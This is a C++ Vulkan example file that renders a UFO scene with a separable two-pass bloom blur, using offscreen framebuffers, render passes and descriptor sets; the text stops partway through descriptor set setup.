<|file_name|>bloom.cpp<|end_file_name|><|fim▁begin|>/* * Vulkan Example - Implements a separable two-pass fullscreen blur (also known as bloom) * * Copyright (C) 2016 by Sascha Willems - www.saschawillems.de * * This code is licensed under the MIT license (MIT) (http://opensource.org/licenses/MIT) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> #include <vector> #define GLM_FORCE_RADIANS #define GLM_FORCE_DEPTH_ZERO_TO_ONE #include <glm/glm.hpp> #include <glm/gtc/matrix_transform.hpp> #include <vulkan/vulkan.h> #include "vulkanexamplebase.h" #define VERTEX_BUFFER_BIND_ID 0 #define ENABLE_VALIDATION false // Offscreen frame buffer properties #define FB_DIM 256 #define FB_COLOR_FORMAT VK_FORMAT_R8G8B8A8_UNORM // Vertex layout for this example std::vector<vkMeshLoader::VertexLayout> vertexLayout = { vkMeshLoader::VERTEX_LAYOUT_POSITION, vkMeshLoader::VERTEX_LAYOUT_UV, vkMeshLoader::VERTEX_LAYOUT_COLOR, vkMeshLoader::VERTEX_LAYOUT_NORMAL }; class VulkanExample : public VulkanExampleBase { public: bool bloom = true; struct { vkTools::VulkanTexture cubemap; } textures; struct { vkMeshLoader::MeshBuffer ufo; vkMeshLoader::MeshBuffer ufoGlow; vkMeshLoader::MeshBuffer skyBox; vkMeshLoader::MeshBuffer quad; } meshes; struct { VkPipelineVertexInputStateCreateInfo inputState; std::vector<VkVertexInputBindingDescription> bindingDescriptions; std::vector<VkVertexInputAttributeDescription> attributeDescriptions; } vertices; struct { vkTools::UniformData vsScene; vkTools::UniformData vsFullScreen; vkTools::UniformData vsSkyBox; vkTools::UniformData fsVertBlur; vkTools::UniformData fsHorzBlur; } uniformData; struct UBO { glm::mat4 projection; glm::mat4 model; }; struct UBOBlur { float blurScale = 1.0f; float blurStrength = 1.5f; uint32_t horizontal; }; struct { UBO scene, fullscreen, skyBox; UBOBlur vertBlur, horzBlur; } ubos; struct { VkPipeline blurVert; VkPipeline blurHorz; VkPipeline glowPass; VkPipeline phongPass; VkPipeline skyBox; } pipelines; // Pipeline layout is shared amongst all descriptor sets VkPipelineLayout pipelineLayout; struct { VkDescriptorSet scene; VkDescriptorSet verticalBlur; VkDescriptorSet horizontalBlur; VkDescriptorSet skyBox; } descriptorSets; // Descriptor set layout is shared amongst all descriptor sets VkDescriptorSetLayout descriptorSetLayout; // Framebuffer for offscreen rendering struct FrameBufferAttachment { VkImage image; VkDeviceMemory mem; VkImageView view; }; struct FrameBuffer { VkFramebuffer framebuffer; FrameBufferAttachment color, depth; VkDescriptorImageInfo descriptor; }; struct OffscreenPass { int32_t width, height; VkRenderPass renderPass; VkSampler sampler; VkCommandBuffer commandBuffer = VK_NULL_HANDLE; // Semaphore used to synchronize between offscreen and final scene rendering VkSemaphore semaphore = VK_NULL_HANDLE; std::array<FrameBuffer, 2> framebuffers; } offscreenPass; VulkanExample() : VulkanExampleBase(ENABLE_VALIDATION) { zoom = -10.25f; rotation = { 7.5f, -343.0f, 0.0f }; timerSpeed *= 0.5f; enableTextOverlay = true; title = "Vulkan Example - Bloom"; } ~VulkanExample() { // Clean up used Vulkan resources // Note : Inherited destructor cleans up resources stored in base class vkDestroySampler(device, offscreenPass.sampler, nullptr); // Frame buffer for (auto& framebuffer : offscreenPass.framebuffers) { // Attachments vkDestroyImageView(device, framebuffer.color.view, nullptr); vkDestroyImage(device, framebuffer.color.image, nullptr); vkFreeMemory(device, framebuffer.color.mem, nullptr); vkDestroyImageView(device, framebuffer.depth.view, nullptr); vkDestroyImage(device, framebuffer.depth.image, nullptr); vkFreeMemory(device, framebuffer.depth.mem, nullptr); vkDestroyFramebuffer(device, framebuffer.framebuffer, nullptr); } vkDestroyRenderPass(device, offscreenPass.renderPass, nullptr); vkFreeCommandBuffers(device, cmdPool, 1, &offscreenPass.commandBuffer); vkDestroySemaphore(device, offscreenPass.semaphore, nullptr); vkDestroyPipeline(device, pipelines.blurHorz, nullptr); vkDestroyPipeline(device, pipelines.blurVert, nullptr); vkDestroyPipeline(device, pipelines.phongPass, nullptr); vkDestroyPipeline(device, pipelines.glowPass, nullptr); vkDestroyPipeline(device, pipelines.skyBox, nullptr); vkDestroyPipelineLayout(device, pipelineLayout, nullptr); vkDestroyDescriptorSetLayout(device, descriptorSetLayout, nullptr); // Meshes vkMeshLoader::freeMeshBufferResources(device, &meshes.ufo); vkMeshLoader::freeMeshBufferResources(device, &meshes.ufoGlow); vkMeshLoader::freeMeshBufferResources(device, &meshes.skyBox); vkMeshLoader::freeMeshBufferResources(device, &meshes.quad); // Uniform buffers vkTools::destroyUniformData(device, &uniformData.vsScene); vkTools::destroyUniformData(device, &uniformData.vsFullScreen); vkTools::destroyUniformData(device, &uniformData.vsSkyBox); vkTools::destroyUniformData(device, &uniformData.fsVertBlur); vkTools::destroyUniformData(device, &uniformData.fsHorzBlur); textureLoader->destroyTexture(textures.cubemap); } // Setup the offscreen framebuffer for rendering the mirrored scene // The color attachment of this framebuffer will then be sampled from void prepareOffscreenFramebuffer(FrameBuffer *frameBuf, VkFormat colorFormat, VkFormat depthFormat) { // Color attachment VkImageCreateInfo image = vkTools::initializers::imageCreateInfo(); image.imageType = VK_IMAGE_TYPE_2D; image.format = colorFormat; image.extent.width = FB_DIM; image.extent.height = FB_DIM; image.extent.depth = 1; image.mipLevels = 1; image.arrayLayers = 1; image.samples = VK_SAMPLE_COUNT_1_BIT; image.tiling = VK_IMAGE_TILING_OPTIMAL; // We will sample directly from the color attachment image.usage = VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT | VK_IMAGE_USAGE_SAMPLED_BIT; VkMemoryAllocateInfo memAlloc = vkTools::initializers::memoryAllocateInfo(); VkMemoryRequirements memReqs; VkImageViewCreateInfo colorImageView = vkTools::initializers::imageViewCreateInfo(); colorImageView.viewType = VK_IMAGE_VIEW_TYPE_2D; colorImageView.format = colorFormat; colorImageView.flags = 0; colorImageView.subresourceRange = {}; colorImageView.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; colorImageView.subresourceRange.baseMipLevel = 0; colorImageView.subresourceRange.levelCount = 1; colorImageView.subresourceRange.baseArrayLayer = 0; colorImageView.subresourceRange.layerCount = 1; VK_CHECK_RESULT(vkCreateImage(device, &image, nullptr, &frameBuf->color.image)); vkGetImageMemoryRequirements(device, frameBuf->color.image, &memReqs); memAlloc.allocationSize = memReqs.size; memAlloc.memoryTypeIndex = vulkanDevice->getMemoryType(memReqs.memoryTypeBits, VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT); VK_CHECK_RESULT(vkAllocateMemory(device, &memAlloc, nullptr, &frameBuf->color.mem)); VK_CHECK_RESULT(vkBindImageMemory(device, frameBuf->color.image, frameBuf->color.mem, 0)); colorImageView.image = frameBuf->color.image; VK_CHECK_RESULT(vkCreateImageView(device, &colorImageView, nullptr, &frameBuf->color.view)); // Depth stencil attachment image.format = depthFormat; image.usage = VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT; VkImageViewCreateInfo depthStencilView = vkTools::initializers::imageViewCreateInfo(); depthStencilView.viewType = VK_IMAGE_VIEW_TYPE_2D; depthStencilView.format = depthFormat; depthStencilView.flags = 0; depthStencilView.subresourceRange = {}; depthStencilView.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; depthStencilView.subresourceRange.baseMipLevel = 0; depthStencilView.subresourceRange.levelCount = 1; depthStencilView.subresourceRange.baseArrayLayer = 0; depthStencilView.subresourceRange.layerCount = 1; VK_CHECK_RESULT(vkCreateImage(device, &image, nullptr, &frameBuf->depth.image)); vkGetImageMemoryRequirements(device, frameBuf->depth.image, &memReqs); memAlloc.allocationSize = memReqs.size; memAlloc.memoryTypeIndex = vulkanDevice->getMemoryType(memReqs.memoryTypeBits, VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT); VK_CHECK_RESULT(vkAllocateMemory(device, &memAlloc, nullptr, &frameBuf->depth.mem)); VK_CHECK_RESULT(vkBindImageMemory(device, frameBuf->depth.image, frameBuf->depth.mem, 0)); depthStencilView.image = frameBuf->depth.image; VK_CHECK_RESULT(vkCreateImageView(device, &depthStencilView, nullptr, &frameBuf->depth.view)); VkImageView attachments[2]; attachments[0] = frameBuf->color.view; attachments[1] = frameBuf->depth.view; VkFramebufferCreateInfo fbufCreateInfo = vkTools::initializers::framebufferCreateInfo(); fbufCreateInfo.renderPass = offscreenPass.renderPass; fbufCreateInfo.attachmentCount = 2; fbufCreateInfo.pAttachments = attachments; fbufCreateInfo.width = FB_DIM; fbufCreateInfo.height = FB_DIM; fbufCreateInfo.layers = 1; VK_CHECK_RESULT(vkCreateFramebuffer(device, &fbufCreateInfo, nullptr, &frameBuf->framebuffer)); // Fill a descriptor for later use in a descriptor set frameBuf->descriptor.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; frameBuf->descriptor.imageView = frameBuf->color.view; frameBuf->descriptor.sampler = offscreenPass.sampler; } // Prepare the offscreen framebuffers used for the vertical- and horizontal blur void prepareOffscreen() { offscreenPass.width = FB_DIM; offscreenPass.height = FB_DIM; // Find a suitable depth format VkFormat fbDepthFormat; VkBool32 validDepthFormat = vkTools::getSupportedDepthFormat(physicalDevice, &fbDepthFormat); assert(validDepthFormat); // Create a separate render pass for the offscreen rendering as it may differ from the one used for scene rendering std::array<VkAttachmentDescription, 2> attchmentDescriptions = {}; // Color attachment attchmentDescriptions[0].format = FB_COLOR_FORMAT; attchmentDescriptions[0].samples = VK_SAMPLE_COUNT_1_BIT; attchmentDescriptions[0].loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attchmentDescriptions[0].storeOp = VK_ATTACHMENT_STORE_OP_STORE; attchmentDescriptions[0].stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; attchmentDescriptions[0].stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attchmentDescriptions[0].initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; attchmentDescriptions[0].finalLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; // Depth attachment attchmentDescriptions[1].format = fbDepthFormat; attchmentDescriptions[1].samples = VK_SAMPLE_COUNT_1_BIT; attchmentDescriptions[1].loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attchmentDescriptions[1].storeOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attchmentDescriptions[1].stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; attchmentDescriptions[1].stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; attchmentDescriptions[1].initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; attchmentDescriptions[1].finalLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; VkAttachmentReference colorReference = { 0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL }; VkAttachmentReference depthReference = { 1, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL }; VkSubpassDescription subpassDescription = {}; subpassDescription.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; subpassDescription.colorAttachmentCount = 1; subpassDescription.pColorAttachments = &colorReference; subpassDescription.pDepthStencilAttachment = &depthReference; // Use subpass dependencies for layout transitions std::array<VkSubpassDependency, 2> dependencies; dependencies[0].srcSubpass = VK_SUBPASS_EXTERNAL; dependencies[0].dstSubpass = 0; dependencies[0].srcStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT; dependencies[0].dstStageMask = VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT; dependencies[0].srcAccessMask = VK_ACCESS_MEMORY_READ_BIT; dependencies[0].dstAccessMask = VK_ACCESS_COLOR_ATTACHMENT_READ_BIT | VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; dependencies[0].dependencyFlags = VK_DEPENDENCY_BY_REGION_BIT; dependencies[1].srcSubpass = 0; dependencies[1].dstSubpass = VK_SUBPASS_EXTERNAL; dependencies[1].srcStageMask = VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT; dependencies[1].dstStageMask = VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT; dependencies[1].srcAccessMask = VK_ACCESS_COLOR_ATTACHMENT_READ_BIT | VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT; dependencies[1].dstAccessMask = VK_ACCESS_MEMORY_READ_BIT; dependencies[1].dependencyFlags = VK_DEPENDENCY_BY_REGION_BIT; // Create the actual renderpass VkRenderPassCreateInfo renderPassInfo = {}; renderPassInfo.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; renderPassInfo.attachmentCount = static_cast<uint32_t>(attchmentDescriptions.size()); renderPassInfo.pAttachments = attchmentDescriptions.data(); renderPassInfo.subpassCount = 1; renderPassInfo.pSubpasses = &subpassDescription; renderPassInfo.dependencyCount = static_cast<uint32_t>(dependencies.size()); renderPassInfo.pDependencies = dependencies.data(); VK_CHECK_RESULT(vkCreateRenderPass(device, &renderPassInfo, nullptr, &offscreenPass.renderPass)); // Create sampler to sample from the color attachments VkSamplerCreateInfo sampler = vkTools::initializers::samplerCreateInfo(); sampler.magFilter = VK_FILTER_LINEAR; sampler.minFilter = VK_FILTER_LINEAR; sampler.mipmapMode = VK_SAMPLER_MIPMAP_MODE_LINEAR; sampler.addressModeU = VK_SAMPLER_ADDRESS_MODE_CLAMP_TO_EDGE; sampler.addressModeV = sampler.addressModeU; sampler.addressModeW = sampler.addressModeU; sampler.mipLodBias = 0.0f; sampler.maxAnisotropy = 0; sampler.minLod = 0.0f; sampler.maxLod = 1.0f; sampler.borderColor = VK_BORDER_COLOR_FLOAT_OPAQUE_WHITE; VK_CHECK_RESULT(vkCreateSampler(device, &sampler, nullptr, &offscreenPass.sampler)); // Create two frame buffers prepareOffscreenFramebuffer(&offscreenPass.framebuffers[0], FB_COLOR_FORMAT, fbDepthFormat); prepareOffscreenFramebuffer(&offscreenPass.framebuffers[1], FB_COLOR_FORMAT, fbDepthFormat); } // Sets up the command buffer that renders the scene to the offscreen frame buffer // The blur method used in this example is multi pass and renders the vertical // blur first and then the horizontal one. // While it's possible to blur in one pass, this method is widely used as it // requires far less samples to generate the blur void buildOffscreenCommandBuffer() { if (offscreenPass.commandBuffer == VK_NULL_HANDLE) { offscreenPass.commandBuffer = VulkanExampleBase::createCommandBuffer(VK_COMMAND_BUFFER_LEVEL_PRIMARY, false); } if (offscreenPass.semaphore == VK_NULL_HANDLE) { VkSemaphoreCreateInfo semaphoreCreateInfo = vkTools::initializers::semaphoreCreateInfo(); VK_CHECK_RESULT(vkCreateSemaphore(device, &semaphoreCreateInfo, nullptr, &offscreenPass.semaphore)); } VkCommandBufferBeginInfo cmdBufInfo = vkTools::initializers::commandBufferBeginInfo(); // First pass: Render glow parts of the model (separate mesh) // ------------------------------------------------------------------------------------------------------- VkClearValue clearValues[2]; clearValues[0].color = { { 0.0f, 0.0f, 0.0f, 1.0f } }; clearValues[1].depthStencil = { 1.0f, 0 }; VkRenderPassBeginInfo renderPassBeginInfo = vkTools::initializers::renderPassBeginInfo(); renderPassBeginInfo.renderPass = offscreenPass.renderPass; renderPassBeginInfo.framebuffer = offscreenPass.framebuffers[0].framebuffer; renderPassBeginInfo.renderArea.extent.width = offscreenPass.width; renderPassBeginInfo.renderArea.extent.height = offscreenPass.height; renderPassBeginInfo.clearValueCount = 2; renderPassBeginInfo.pClearValues = clearValues; VK_CHECK_RESULT(vkBeginCommandBuffer(offscreenPass.commandBuffer, &cmdBufInfo)); VkViewport viewport = vkTools::initializers::viewport((float)offscreenPass.width, (float)offscreenPass.height, 0.0f, 1.0f); vkCmdSetViewport(offscreenPass.commandBuffer, 0, 1, &viewport); VkRect2D scissor = vkTools::initializers::rect2D(offscreenPass.width, offscreenPass.height, 0, 0); vkCmdSetScissor(offscreenPass.commandBuffer, 0, 1, &scissor); vkCmdBeginRenderPass(offscreenPass.commandBuffer, &renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); vkCmdBindDescriptorSets(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.scene, 0, NULL); vkCmdBindPipeline(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.glowPass); VkDeviceSize offsets[1] = { 0 }; vkCmdBindVertexBuffers(offscreenPass.commandBuffer, VERTEX_BUFFER_BIND_ID, 1, &meshes.ufoGlow.vertices.buf, offsets); vkCmdBindIndexBuffer(offscreenPass.commandBuffer, meshes.ufoGlow.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(offscreenPass.commandBuffer, meshes.ufoGlow.indexCount, 1, 0, 0, 0); vkCmdEndRenderPass(offscreenPass.commandBuffer); // Second pass: Render contents of the first pass into second framebuffer and apply a vertical blur // This is the first blur pass, the horizontal blur is applied when rendering on top of the scene // ------------------------------------------------------------------------------------------------------- renderPassBeginInfo.framebuffer = offscreenPass.framebuffers[1].framebuffer; vkCmdBeginRenderPass(offscreenPass.commandBuffer, &renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); // Draw horizontally blurred texture vkCmdBindDescriptorSets(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.verticalBlur, 0, NULL); vkCmdBindPipeline(offscreenPass.commandBuffer, VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.blurVert); vkCmdBindVertexBuffers(offscreenPass.commandBuffer, VERTEX_BUFFER_BIND_ID, 1, &meshes.quad.vertices.buf, offsets); vkCmdBindIndexBuffer(offscreenPass.commandBuffer, meshes.quad.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(offscreenPass.commandBuffer, meshes.quad.indexCount, 1, 0, 0, 0); vkCmdEndRenderPass(offscreenPass.commandBuffer); VK_CHECK_RESULT(vkEndCommandBuffer(offscreenPass.commandBuffer)); } void reBuildCommandBuffers() { if (!checkCommandBuffers()) { destroyCommandBuffers(); createCommandBuffers(); } buildCommandBuffers(); } void buildCommandBuffers() { VkCommandBufferBeginInfo cmdBufInfo = vkTools::initializers::commandBufferBeginInfo(); VkClearValue clearValues[2]; clearValues[0].color = defaultClearColor; clearValues[1].depthStencil = { 1.0f, 0 }; VkRenderPassBeginInfo renderPassBeginInfo = vkTools::initializers::renderPassBeginInfo(); renderPassBeginInfo.renderPass = renderPass; renderPassBeginInfo.renderArea.offset.x = 0; renderPassBeginInfo.renderArea.offset.y = 0; renderPassBeginInfo.renderArea.extent.width = width; renderPassBeginInfo.renderArea.extent.height = height; renderPassBeginInfo.clearValueCount = 2; renderPassBeginInfo.pClearValues = clearValues; for (int32_t i = 0; i < drawCmdBuffers.size(); ++i) { // Set target frame buffer renderPassBeginInfo.framebuffer = frameBuffers[i]; VK_CHECK_RESULT(vkBeginCommandBuffer(drawCmdBuffers[i], &cmdBufInfo)); vkCmdBeginRenderPass(drawCmdBuffers[i], &renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); VkViewport viewport = vkTools::initializers::viewport((float)width, (float)height, 0.0f, 1.0f); vkCmdSetViewport(drawCmdBuffers[i], 0, 1, &viewport); VkRect2D scissor = vkTools::initializers::rect2D(width, height, 0, 0); vkCmdSetScissor(drawCmdBuffers[i], 0, 1, &scissor); VkDeviceSize offsets[1] = { 0 }; // Skybox vkCmdBindDescriptorSets(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.skyBox, 0, NULL); vkCmdBindPipeline(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.skyBox); vkCmdBindVertexBuffers(drawCmdBuffers[i], VERTEX_BUFFER_BIND_ID, 1, &meshes.skyBox.vertices.buf, offsets); vkCmdBindIndexBuffer(drawCmdBuffers[i], meshes.skyBox.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(drawCmdBuffers[i], meshes.skyBox.indexCount, 1, 0, 0, 0); // 3D scene vkCmdBindDescriptorSets(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.scene, 0, NULL); vkCmdBindPipeline(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.phongPass); vkCmdBindVertexBuffers(drawCmdBuffers[i], VERTEX_BUFFER_BIND_ID, 1, &meshes.ufo.vertices.buf, offsets); vkCmdBindIndexBuffer(drawCmdBuffers[i], meshes.ufo.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(drawCmdBuffers[i], meshes.ufo.indexCount, 1, 0, 0, 0); // Render vertical blurred scene applying a horizontal blur // Render the (vertically blurred) contents of the second framebuffer and apply a horizontal blur // ------------------------------------------------------------------------------------------------------- if (bloom) { vkCmdBindDescriptorSets(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelineLayout, 0, 1, &descriptorSets.horizontalBlur, 0, NULL); vkCmdBindPipeline(drawCmdBuffers[i], VK_PIPELINE_BIND_POINT_GRAPHICS, pipelines.blurHorz); vkCmdBindVertexBuffers(drawCmdBuffers[i], VERTEX_BUFFER_BIND_ID, 1, &meshes.quad.vertices.buf, offsets); vkCmdBindIndexBuffer(drawCmdBuffers[i], meshes.quad.indices.buf, 0, VK_INDEX_TYPE_UINT32); vkCmdDrawIndexed(drawCmdBuffers[i], meshes.quad.indexCount, 1, 0, 0, 0); } vkCmdEndRenderPass(drawCmdBuffers[i]); VK_CHECK_RESULT(vkEndCommandBuffer(drawCmdBuffers[i])); } if (bloom) { buildOffscreenCommandBuffer(); } } void loadAssets() { loadMesh(getAssetPath() + "models/retroufo.dae", &meshes.ufo, vertexLayout, 0.05f); loadMesh(getAssetPath() + "models/retroufo_glow.dae", &meshes.ufoGlow, vertexLayout, 0.05f); loadMesh(getAssetPath() + "models/cube.obj", &meshes.skyBox, vertexLayout, 1.0f); textureLoader->loadCubemap(getAssetPath() + "textures/cubemap_space.ktx", VK_FORMAT_R8G8B8A8_UNORM, &textures.cubemap); } // Setup vertices for a single uv-mapped quad void generateQuad() { struct Vertex { float pos[3]; float uv[2]; float col[3]; float normal[3]; }; #define QUAD_COLOR_NORMAL { 1.0f, 1.0f, 1.0f }, { 0.0f, 0.0f, 1.0f } std::vector<Vertex> vertexBuffer = { { { 1.0f, 1.0f, 0.0f },{ 1.0f, 1.0f }, QUAD_COLOR_NORMAL }, { { 0.0f, 1.0f, 0.0f },{ 0.0f, 1.0f }, QUAD_COLOR_NORMAL }, { { 0.0f, 0.0f, 0.0f },{ 0.0f, 0.0f }, QUAD_COLOR_NORMAL }, { { 1.0f, 0.0f, 0.0f },{ 1.0f, 0.0f }, QUAD_COLOR_NORMAL } }; #undef QUAD_COLOR_NORMAL createBuffer( VK_BUFFER_USAGE_VERTEX_BUFFER_BIT, vertexBuffer.size() * sizeof(Vertex), vertexBuffer.data(), &meshes.quad.vertices.buf, &meshes.quad.vertices.mem); // Setup indices std::vector<uint32_t> indexBuffer = { 0,1,2, 2,3,0 }; meshes.quad.indexCount = indexBuffer.size(); createBuffer( VK_BUFFER_USAGE_INDEX_BUFFER_BIT, indexBuffer.size() * sizeof(uint32_t), indexBuffer.data(), &meshes.quad.indices.buf, &meshes.quad.indices.mem); } void setupVertexDescriptions() { // Binding description // Same for all meshes used in this example vertices.bindingDescriptions.resize(1); vertices.bindingDescriptions[0] = vkTools::initializers::vertexInputBindingDescription( VERTEX_BUFFER_BIND_ID, vkMeshLoader::vertexSize(vertexLayout), VK_VERTEX_INPUT_RATE_VERTEX); // Attribute descriptions vertices.attributeDescriptions.resize(4); // Location 0 : Position vertices.attributeDescriptions[0] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 0, VK_FORMAT_R32G32B32_SFLOAT, 0); // Location 1 : Texture coordinates vertices.attributeDescriptions[1] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 1, VK_FORMAT_R32G32_SFLOAT, sizeof(float) * 3); // Location 2 : Color vertices.attributeDescriptions[2] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 2, VK_FORMAT_R32G32B32_SFLOAT, sizeof(float) * 5); // Location 3 : Normal vertices.attributeDescriptions[3] = vkTools::initializers::vertexInputAttributeDescription( VERTEX_BUFFER_BIND_ID, 3, VK_FORMAT_R32G32B32_SFLOAT, sizeof(float) * 8); vertices.inputState = vkTools::initializers::pipelineVertexInputStateCreateInfo(); vertices.inputState.vertexBindingDescriptionCount = vertices.bindingDescriptions.size(); vertices.inputState.pVertexBindingDescriptions = vertices.bindingDescriptions.data(); vertices.inputState.vertexAttributeDescriptionCount = vertices.attributeDescriptions.size(); vertices.inputState.pVertexAttributeDescriptions = vertices.attributeDescriptions.data(); } void setupDescriptorPool() { std::vector<VkDescriptorPoolSize> poolSizes = { vkTools::initializers::descriptorPoolSize(VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 8), vkTools::initializers::descriptorPoolSize(VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 6) }; VkDescriptorPoolCreateInfo descriptorPoolInfo = vkTools::initializers::descriptorPoolCreateInfo( poolSizes.size(), poolSizes.data(), 5); VK_CHECK_RESULT(vkCreateDescriptorPool(device, &descriptorPoolInfo, nullptr, &descriptorPool)); } void setupDescriptorSetLayout() { // Textured quad pipeline layout std::vector<VkDescriptorSetLayoutBinding> setLayoutBindings = { // Binding 0 : Vertex shader uniform buffer vkTools::initializers::descriptorSetLayoutBinding( VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, VK_SHADER_STAGE_VERTEX_BIT, 0), // Binding 1 : Fragment shader image sampler vkTools::initializers::descriptorSetLayoutBinding( VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, VK_SHADER_STAGE_FRAGMENT_BIT, 1), // Binding 2 : Framgnet shader image sampler vkTools::initializers::descriptorSetLayoutBinding( VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, VK_SHADER_STAGE_FRAGMENT_BIT, 2), }; VkDescriptorSetLayoutCreateInfo descriptorLayout = vkTools::initializers::descriptorSetLayoutCreateInfo( setLayoutBindings.data(), setLayoutBindings.size()); VK_CHECK_RESULT(vkCreateDescriptorSetLayout(device, &descriptorLayout, nullptr, &descriptorSetLayout)); VkPipelineLayoutCreateInfo pPipelineLayoutCreateInfo = vkTools::initializers::pipelineLayoutCreateInfo( &descriptorSetLayout, 1); VK_CHECK_RESULT(vkCreatePipelineLayout(device, &pPipelineLayoutCreateInfo, nullptr, &pipelineLayout)); } void setupDescriptorSet() { VkDescriptorSetAllocateInfo allocInfo = vkTools::initializers::descriptorSetAllocateInfo( descriptorPool, &descriptorSetLayout, 1); std::vector<VkWriteDescriptorSet> writeDescriptorSets; // Full screen blur descriptor sets // Vertical blur VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.verticalBlur)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.verticalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsScene.descriptor), // Binding 1: Fragment shader texture sampler vkTools::initializers::writeDescriptorSet(descriptorSets.verticalBlur, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, &offscreenPass.framebuffers[0].descriptor), // Binding 2: Fragment shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.verticalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 2, &uniformData.fsVertBlur.descriptor) }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); // Horizontal blur VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.horizontalBlur)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.horizontalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsScene.descriptor), // Binding 1: Fragment shader texture sampler vkTools::initializers::writeDescriptorSet(descriptorSets.horizontalBlur, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, &offscreenPass.framebuffers[1].descriptor), // Binding 2: Fragment shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.horizontalBlur, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 2, &uniformData.fsHorzBlur.descriptor) }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); // 3D scene VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.scene)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.scene, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsFullScreen.descriptor) }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); // Skybox VK_CHECK_RESULT(vkAllocateDescriptorSets(device, &allocInfo, &descriptorSets.skyBox)); writeDescriptorSets = { // Binding 0: Vertex shader uniform buffer vkTools::initializers::writeDescriptorSet(descriptorSets.skyBox, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, &uniformData.vsSkyBox.descriptor), // Binding 1: Fragment shader texture sampler 